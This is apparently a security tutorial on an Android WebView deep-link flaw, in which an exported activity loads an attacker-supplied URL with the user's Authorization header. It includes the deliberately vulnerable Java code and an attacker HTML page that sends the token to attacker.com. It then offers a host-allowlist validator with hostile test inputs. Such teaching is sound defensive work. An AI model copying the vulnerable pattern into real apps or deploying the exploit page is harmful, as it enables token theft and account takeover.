WebView is a simple but powerful way to present web-based content in Android. It is used as a dedicated web browser instance of an application that can deliver web pages to users. WebView was first released as a part of Android 4.4. Since Android 5.0, it is included as a system application.
WebView vulnerabilities that allow threat actors to:
We will use the following AndroidManifest.xml entry to understand how threat actors can exploit WebView. The activity is exported through an intent filter for the custom scheme myapp://deeplink, so any app (or a web page the user taps) on the device can start it:

<activity android:name=".DeeplinkActivity">
    <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <data android:scheme="myapp" android:host="deeplink" />
    </intent-filter>
</activity>
Let's assume that this activity processes WebView deep links as follows:

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebView;
import java.util.HashMap;
import java.util.Map;

public class DeeplinkActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        handleDeeplink(getIntent());
    }

    private void handleDeeplink(Intent intent) {
        Uri deeplink = intent.getData();
        // The "url" query parameter is fully controlled by whoever sent the deep link
        if ("/webview".equals(deeplink.getPath())) {
            String url = deeplink.getQueryParameter("url");
            handleWebViewDeeplink(url);
        }
    }

    private void handleWebViewDeeplink(String url) {
        WebView webView = …;
        setupWebView(webView);
        // The unvalidated URL is loaded together with the user's auth headers
        webView.loadUrl(url, getAuthHeaders());
    }

    private Map<String, String> getAuthHeaders() {
        Map<String, String> headers = new HashMap<>();
        headers.put("Authorization", getUserToken());
        return headers;
    }
}
In this case an attacker can carry out a remote attack to obtain the user's authentication token by creating a page with the following code:

<html>
<body style="text-align: center;">
    <h1><a href="myapp://deeplink/webview?url=https://attacker.com/">Click Me!</a></h1>
</body>
</html>
When the victim clicks "Click Me!", the vulnerable app opens https://attacker[.]com in the WebView and sends the Authorization header along with the request. The attacker can then use the stolen authentication token to gain full access to the victim's account.
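The fix is to never attach the session token to a URL that came from outside the app unless its scheme and host are on a strict allowlist. The following validator is an added example written for this post, not code from the vulnerable app; the trusted host names are assumed, and it uses java.net.URI so it can be run on a plain JDK and then called from handleWebViewDeeplink before loadUrl.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashSet;
import java.util.Set;

public class DeeplinkUrlPolicy {
    // Hosts allowed to receive the Authorization header (assumed values for this example).
    private static final Set<String> TRUSTED_HOSTS = Collections.unmodifiableSet(
            new HashSet<>(Arrays.asList("app.example.com", "www.example.com")));

    /** Returns true only for an https URL whose host is exactly one of the trusted hosts. */
    public static boolean isTrustedUrl(String url) {
        if (url == null) return false;
        URI uri;
        try {
            uri = new URI(url);
        } catch (URISyntaxException e) {
            return false;                       // malformed input is rejected, not guessed at
        }
        if (!"https".equalsIgnoreCase(uri.getScheme())) return false;   // no http:, javascript:, file:
        String host = uri.getHost();
        if (host == null) return false;         // opaque URI or no authority component
        if (uri.getUserInfo() != null) return false;  // rejects https://app.example.com@attacker.com
        // Exact match only: a prefix or suffix check would accept app.example.com.attacker.com
        return TRUSTED_HOSTS.contains(host.toLowerCase());
    }

    // In the activity, the vulnerable method becomes:
    //   private void handleWebViewDeeplink(String url) {
    //       if (!DeeplinkUrlPolicy.isTrustedUrl(url)) return;   // drop the deep link silently
    //       WebView webView = ...; setupWebView(webView);
    //       webView.loadUrl(url, getAuthHeaders());
    //   }

    public static void main(String[] args) {
        String[] samples = {                    // constructed test inputs
            "https://app.example.com/account",              // true
            "https://attacker.com/",                        // false
            "https://app.example.com.attacker.com/",        // false
            "https://app.example.com@attacker.com/",        // false
            "javascript:alert(1)",                          // false
            "http://app.example.com/"                       // false
        };
        for (String s : samples) System.out.println(isTrustedUrl(s) + "\t" + s);
    }
}
```

Because a page loaded in the WebView can navigate to other origins, the same check belongs in the WebViewClient's shouldOverrideUrlLoading so the policy is enforced on every navigation, not only on the initial deep link.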